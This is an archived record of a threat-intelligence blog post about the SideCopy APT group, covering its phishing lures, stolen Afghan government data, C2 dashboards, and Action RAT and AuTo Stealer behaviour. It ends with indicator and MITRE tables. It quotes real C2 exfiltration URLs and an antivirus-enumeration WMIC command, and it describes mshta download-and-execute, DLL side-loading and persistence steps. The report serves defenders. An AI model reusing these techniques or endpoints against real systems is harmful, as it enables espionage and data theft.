{ "id": "7e52f5b9-fcdc-4934-81fe-470f9aa69626", "created_at": "2026-04-06T00:08:04.037073Z", "updated_at": "2026-04-10T03:36:50.231088Z", "deleted_at": null, "sha1_hash": "0b1764f058dae3ad01b60b4d305caecafe09f8e5", "title": "SideCopy APT: Connecting lures to victims, payloads to infrastructure", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7368498, "plain_text": "SideCopy APT: Connecting lures to victims, payloads to infrastructure\r\nPublished: 2021-12-02 · Archived: 2026-04-02 11:15:53 UTC\r\nThis blog post was authored by Hossein Jazi and the Threat Intelligence Team.\r\nLast week, Facebook announced that back in August it had taken action against a Pakistani APT group known as SideCopy.\r\nFacebook describes how the threat actors used romantic lures to compromise targets in Afghanistan.\r\nIn this blog post we are providing additional details about SideCopy that have not been published before. We were able to\r\nhave unique insights about victims and targeted countries as well as the kind of data the APT group was able to successfully\r\nexfiltrate. Among the information that was stolen is access to government portals, Facebook, Twitter and Google credentials,\r\nbanking information, and password-protected documents.\r\nIn addition, we detail how this threat actor had started to use new initial infection vectors for its operations which include\r\nMicrosoft Publisher documents and Trojanized applications. Finally, we detail a newly-observed stealer that has been used\r\nby this actor called AuTo stealer.\r\nNewly observed lures\r\nThe SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian\r\ncountries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of\r\nthe SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a\r\nsubdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.\r\nArticle continues below this ad.\r\nThe lures used by SideCopy APT are usually archive files that have embedded one of these files: Lnk, Microsoft Publisher\r\nor Trojanized Applications. These lures can be categorized into two main groups:\r\nTargeted lures: These lures are specially crafted and designed to target specific victims. We believe this category is\r\nvery well customized to target government or military officials. Here some of the examples:\r\nReport-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip:\r\nThis archive file contains a Microsoft Publisher document that is a letter from “Mr Ahmad Shuja Jamal,\r\nformer DG for International Relations and Regional Cooperation at the National Security Council of\r\nAfghanistan” to “Hamdullah Mohib, former National Security Adviser of Afghanistan”. This letter is about a\r\n“meeting with representatives of France and UK delegations of Afghanistan”. Most likely this lure has been\r\nused to target Afghanistan government officials and especially foreign affair related officials.\r\naddress-list-ere-update-sep-2021.zip: This archive file contains a malicious lnk file which loads a decoy PDF\r\nfile. The decoy PDF file is: “Email facility address list of the ERE units: 20 Sept 2021”. This lure seems to be\r\nused to target the Indian Army and National Cadet Corps of India.\r\nNCERT-NCF-LTV-Vislzr-2022.zip: Similar to the previous one, this includes a malicious lnk that loads a\r\ndecoy PDF file. The decoy is a curriculum of the course named “Living the values, a value-narrative to grass-root leadership” offered by NCERT (National Council of Educational Research and Training of India).\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 1 of 18\n\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 2 of 18\n\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 3 of 18\n\nGeneric lures: These lures are mostly generic and most likely have been used in spam campaigns to collect emails\r\nand credentials to help the actor perform their targeted attacks. In this category we observed the following: (The first\r\nthree lures are the ones reported as “romantic lures” in a Facebook report)\r\nUsing girl names as the archive file name such as “nisha.zip“: (showing girl pictures with an application)\r\nThese archive files contain a list of images with the “.3d” extension and an application named “3Dviewer.exe”\r\nthat needs to to be executed to load and view images. In fact, the executable is Trojanized and will contact the\r\nactor servers to download the malicious payloads.\r\n“image-random number.zip“: These zip files contains a malicious lnk file that shows a girl picture as a decoy.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 4 of 18\n\n“Whatsapp-image-random number.zip“: These zip files contain a malicious lnk file that shows a girl picture as\r\na decoy.\r\n“schengen_visa_application_form_english.zip“: This archive file contains a Microsoft Publisher document\r\nthat loads a Schengen Visa Application Form in English as decoy. This is used to target people who want to\r\ntravel to European countries.\r\n“Download-Maria-Gul-CV.zip“: This archive contains a lnk that loads a resume as decoy. The name of the\r\narchive file usually is in this pattern “Download-Name-FamilyName-CV.zip”\r\n“New document.zip“: This loads a document as decoy. We were not able to retrieve the lure in this case.\r\nVictimology\r\nAs previously reported, the SideCopy APT has mainly targeted defense and armed forces personnel in the Indian\r\nsubcontinent but there are not many reports about how successful these attacks were and what data was exfiltrated. The\r\nMalwarebytes Threat Intelligence team was able to identify some of the successful attacks operated by this APT. It is worth\r\nnoting that those compromises happened before the Taliban completely took over Afghanistan. In fact, Facebook’s\r\nintervention in August matches with the timeline of indicators we recorded.\r\nAdministration Office of the President (AOP) of Afghanistan personnel: This actor has operated targeted spear\r\nphishing attacks on members of AOP and was able to gain access to ten of them and steal their credentials from\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 5 of 18\n\ndifferent government services such as mis.aop.gov.af , internal service, bank services (Maiwand Bank) and\r\npersonal accounts such as Google, Twitter and Facebook.\r\nMinistry of Foreign affairs- Afghanistan: We have evidence that the actor infected one of the members of the\r\nMinistry of External affairs but it seems they were not able to collect any data from this victim.\r\nMinistry of Finance, Afghanistan: The actor infected two members of MOF but mostly they were able to collect\r\npersonal accounts such as Google and Facebook and Bank accounts (“worldbankgroup.csod.com”). They also\r\nexfiltrated documents that are password protected.\r\nAfghanistan’s National Procurement Authority (NPA): The actor infected one person in NPA and were able to stead\r\npersonal credentials including Twitter, Facebook, Instagram, Pinterest, Google and the mis.aop.gov.af account.\r\nA shared computer, India: It seems the actor gained access to a shared machine and collected a lot of credentials from\r\ngovernment and eduction services. It seems this machine has been infected using one of the generic lures.\r\nThe SideCopy APT was able to steal several Office documents and databases associated with the Government of\r\nAfghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of\r\nForeign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to\r\nthe General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards\r\nof several Afghani government officials.\r\nThe exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible\r\nthat they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential\r\nletters that we think the actor is planning to use for future lures.\r\nAttacker infrastructure\r\nWe have uncovered the main command and control (C2) server used by the attacker to monitor and control their victims.\r\nEach archive file that is used by the attacker to send to victims is considered a unique package and each package has its own\r\npayloads including hta and executables that usually are hosted on compromised domains. The actor has a system named\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 6 of 18\n\n“Scout” to monitor each package. The Scout system has four users with English nicknames (Hendrick, Alexander, Hookes,\r\nMalone). It also defines teams that are responsible to manage each package.\r\nIn this system, they have a dashboard that shows all the infected machines. Each row in the dashboard shows one package\r\nand its statistics which includes the IP address of the victim, package name, OS version, User-Agent, browser information,\r\ncountry and victim status.\r\nThe actor uses a different dashboard called Crusader to monitor the Action RAT statistics.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 7 of 18\n\nAnalysis of the new attacks\r\nAs we mentioned earlier, the actor has used three different methods as its initial infection vector: lnk files, Microsoft\r\nPublisher files and Trojanized application. The lnk files have been well studied and what we have observed is very similar to\r\nwhat already has been reported, with only small changes. For example, we observed that they have updated the code\r\nof hta.dll and preBotHta.dll and added some more features.\r\nIn this section we provide the analysis for the other two variants: Microsoft Publisher and Trojanized Applications.\r\nMicrosoft Office Publisher\r\nIn this variant, attackers have embedded a Microsoft Office Publisher document in an archive file. We’ve identified two\r\nvariants of the Office publisher documents:\r\nReport to NSA Mohib – Meeting with FR, GE, UK – 12 Nov 2020.docx.pub\r\nschengen_visa_application_form_english.pub\r\nBoth of these documents were created in August 2021 and we believe they have been used in the most recent campaign.\r\nBoth of these documents contains a simple macro that calls Shell function to call mshta.exe to download and execute a\r\nspecified hta file.\r\nThe hta file loads the loader DLL (PreBotHta.dll) into memory and then collects AV product names. The AV name along\r\nwith the encoded payloads that need to be loaded by this loader are passed to the  PinkAgain  function.\r\nThe loader is responsible for dropping both  credwiz.exe  and\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 8 of 18\n\nDuser.dll\r\n. Unlike what has been reported, in this case  Duser.dllis not copied into different locations based on AV products and it\r\nis copied into\r\nC:ProgramDataShareIt\r\nfor all AV products.\r\nThis loader just does some additional work based on the AV product. For example if the AV product is Avira it tries to\r\ndownload and execute an additional hta file to deploy additional payloads.\r\nAfter dropping the required files onto the victim, it starts the “credwiz.exe” process. This executable sideloads the malicious\r\npayload “Duser.dll”. This payload has been written in Delphi (this is the Delphi variant of Action Rat) and compiled on\r\nOctober 2 2021.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 9 of 18\n\nAll the commands, strings and domains in this RAT are base64 encoded. The malicious process starts by collecting\r\nhostname, username, OS version, OS architecture, Mac address and installed AV products (by executing  cmd.exe WMIC\r\n/Node:localhost /Namespace:\\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List ) from the\r\nvictim and sending them to the command and control server using a HTTP request (\r\n\"https://afrepublic.xyz/classification/classification.php\"\r\n).\r\nIt then goes into a loop and waits for commands from the server to execute them. This RAT has the capability to execute one\r\nof the following commands:\r\nCommand: Execute commands received from the server\r\nDownload: Download additional payloads\r\nDrives: Get drive info\r\nGetFiles: Get files info\r\nExecute: Execute a specified payload using CreateProcessW\r\nUpload: Upload files to server\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 10 of 18\n\nAfter execution of each command it reports back the result to its server. The reporting url is different than the C2 url. The\r\nreport type depends on the command, for example if the payload executes a command, it reports the following information\r\nto the server: Victim’s ID, the executed command, the command output and the error message if the command execution\r\nwas not successful.\r\nTrojanized Image Viewer Application (3DViewer.exe)\r\nIn this variant, the attacker has distributed an archive file including an application named  3Dviewer.exe  and a set of\r\nimages with “\r\n3d\r\n” extension that can be only opened by that executable.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 11 of 18\n\nIt seems the attacker Trojanized an image viewer application named “3Dviewer” to download and execute a malicious HTA\r\nfile using Mshta in addition to its normal function that can load and show the pictures. This executable has been compiled on\r\nOctober 26 2021. The rest of the process is similar to what we described in the previous section.\r\nAuTo Stealer\r\nWe also came across another Stealer used by this actor that has been written in C++. To the best of our knowledge this is a\r\nnew Stealer used by SideCopy APT. A Loader has been used to drop and load an executable ( credbiz.exe ) that side loads\r\nthe Stealer. We were able to identify two different variants of this Loader that have been used to load an HTTP version and\r\nTCP version of the Stealer. Both of these loaders and the Stealer components have been compiled on October 30 2021:\r\nLoader\r\nBased on the functionality, we can say this Loader is a C++ variant of  PreBotHta.dll  (C# Loader used to load other Rats\r\nused by this actor). This Loader is responsible for dropping the following files in\r\nC:ProgramDataOracle\r\ndirectory:\r\ncredwiz.exe executable and rename it as credbiz.exe .\r\nTextShaping.dll (Stealer component that will be side loaded by credbiz.exe )\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 12 of 18\n\nSimilar to  PreBotHta.Dll , it checks the installed AV product on the victim’s machine and performs additional actions\r\nbased on the AV product name. For example if the AV is Avast, Avira, BitDefender or AVG it creates a batch file (\r\nsysboot.bat\r\n) and executes it by calling  cmd.exe . This makes\r\ncredbiz.exe\r\npersistence through the AutoRun registry key. If the installed AV is one of the Kaspersky, Symantec, Mcafee or QuickHeal it\r\ncreates an lnk file ( Win Setting Loader.lnk ) for persistency in StartUp directory.\r\nAfter performing the additional process, it executes  credbiz.exe  by calling\r\nCreateProcessW\r\n.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 13 of 18\n\nTextShaping.dll (Stealer component)\r\nThe actor used two different variants of the Stealer Stealer: HTTP and TCP. The HTTP version performs the exfiltration over\r\nHTTP while the TCP variant performs all the exfiltration over TCP. This component also has an interesting unique PDB\r\npath:  \"D:Project AlphaHTTP AutoappReleaseapp.pdb\"\r\nThis Stealer collects PowerPoint, Word, Excel and PDF documents, text files, database files and images and exfiltrates them\r\nto its server over HTTP or TCP. To exfiltrate the data using HTTP, it builds a request that is specific to data files being\r\nexfiltrated and sends them over an HTTP server. For example, when it wants to exfiltrate PowerPoint documents it builds\r\nthe following request and sends them over HTTP:\r\nhttp://newsroom247.xyz:8080/streamppt?HostName_UserName\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 14 of 18\n\nFor other file types it adds the\r\n/stream  related to the file type and exfiltrates them to server. Here are the list of them:\r\n/streamppt, /streamdoc, /streamxls, /streamdb, /streamtxt, /streampdf, /streamimg\r\n.\r\nBefore starting the stealing process, it collects the victim’s information including username, hostname, OS info and AV\r\nproducts and sends them to its server by adding “ user_details ” to the domain. Also, it collects file information from the\r\nvictim’s machine and stores it in a file “\r\nHostname_UserName.txt\r\n” and sends the file by using the “ logs_receiver ” command.\r\nConclusion\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 15 of 18\n\nThe SideCopy APT has been actively targeting government and military officials in South Asia. The group mainly uses\r\narchived files to target victims in spam or spear phishing campaigns. The archive files usually have an embedded lnk, Office\r\nor Trojanized application that are used to call mshta to download and execute an hta file. The hta files perform fileless\r\npayload execution to deploy one of the RATs associated with this actor such as AllaKore or Action Rat. Malwarebytes\r\nproducts can identify the initial infection vectors used by SideCopy and block them from execution.\r\nIOCs\r\nName IOC Type Description\r\nReport-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip\r\n4E26CCAD3FC762EC869F7930A8457E4D MD5\r\nschengen_visa_application_form_english.zip C2831369728B7247193E2DB567900ABE MD5\r\nnew document.zip 689B9FDBF35B8CEFC266A92D1D05A814 MD5\r\nImage-8765.zip D52021F350C9C2F8EE87D3B9C070704A MD5\r\nImage-8853.zip D99491117D3D96DA7D01597929BE6C8E MD5\r\n479_1000.zip 7C0A49F3B4A012BADE8404A3BE353A48 MD5\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 16 of 18\n\nMuniba.zip A65D3AB8618E7965B9AE4FAE558EB8F2 MD5\r\nnisha.zip 48C165124E151AA2A1F4909E0B34E99C MD5\r\nWhatsapp-Image-7569.zip 0023A30B3F91FA9989E0843BBEB67CC1 MD5\r\nDownload-Maria-Gul-CV.zip 5044027CCB27401B06515F0912EB534A MD5\r\nDP_TCP.exe ec87ddad01869b58c4c0760a6a7d98f8 MD5\r\nAuTo\r\nStealer\r\nDP_HTTP.exe e246728aa4679051ed20355ae862b7ef MD5\r\nAuTo\r\nStealer\r\n TextShaping.dll c598a8406e2b9ec599ab9e6ec4e7d7c2 MD5\r\nAuTo\r\nStealer\r\nTextShaping.dll 5f49c816d7d2b6fa274041055cc88ba7 MD5\r\nAuTo\r\nStealer\r\nPayloads\r\nDomain/IP Description\r\nafrepublic.xyz C2\r\nnewsroom247.xyz C2\r\nafghannewsnetwork.com C2\r\nmaajankidevisevasansthan.org Host payloads\r\namsss.in Host payloads\r\nscouttable.xyz C2\r\nsecuredesk.one C2\r\neurekawatersolution.com Host payloads\r\nrepublicofaf.xyz C2\r\nsecurecheker.in Host payloads\r\nappsstore.in C2\r\nscout.fontsplugins.com C2\r\n144.126.141.41 C2\r\nC2s and Payloads Hosts\r\nMitre attack techniques\r\nTactic id Name Details\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 17 of 18\n\nPhishing T1566.001 Spear phishing Attachment\r\nDistribute archive file as an\r\nspear phishing attachment\r\nExecution T1047\r\nWindows Management\r\nInstrumentation\r\nUses WMIC.EXE to obtain\r\na system information\r\nUses WMIC.EXE to obtain\r\na list of AntiViruses\r\nExecution T1059.003\r\nCommand and Scripting\r\nInterpreter: Windows Command Shell\r\nStarts CMD.EXE for\r\ncommands execution\r\nExecution T1204.001 User Execution: Malicious Link\r\nExecution T1204.002 User Execution: Malicious File\r\npersistence T1547.001\r\nBoot or Logon Autostart\r\nExecution: Registry Run Keys /\r\nStartup Folder\r\nDiscovery T1012 Query Registry Reads the computer name\r\nDiscovery T1082 System information discovery\r\nDiscovery T1518.001\r\nSoftware Discovery: Security Software\r\nDiscovery\r\nUses WMIC.EXE to obtain\r\na list of AntiViruses\r\nDefense\r\nEvasion\r\nT1218.005 Signed binary proxy execution: mshta\r\nStarts MSHTA.EXE for\r\nopening HTA or HTMLS\r\nfiles \r\nDefense\r\nEvasion\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nUses base64 decodes to\r\ndecode C2s\r\nDefense\r\nEvasion\r\nT1574.002\r\nHijack Execution Flow: DLL Side-LoadingUses credwiz.exe to side\r\nload its malicious payloads\r\nCollection T1119 Automated Collection\r\nCollects db files, docs and\r\npdfs automatically\r\nCollection T1005 Data from Local System\r\nCommand and\r\nControl\r\n T1071.001\r\nApplication Layer Protocol: Web\r\nProtocols\r\nCommand and\r\nControl\r\n T1071.002\r\nApplication Layer Protocol: File\r\nTransfer Protocols\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/" ], "report_names": [ "sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434084, "ts_updated_at": 1775792210, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0b1764f058dae3ad01b60b4d305caecafe09f8e5.pdf", "text": "https://archive.orkl.eu/0b1764f058dae3ad01b60b4d305caecafe09f8e5.txt", "img": "https://archive.orkl.eu/0b1764f058dae3ad01b60b4d305caecafe09f8e5.jpg" } }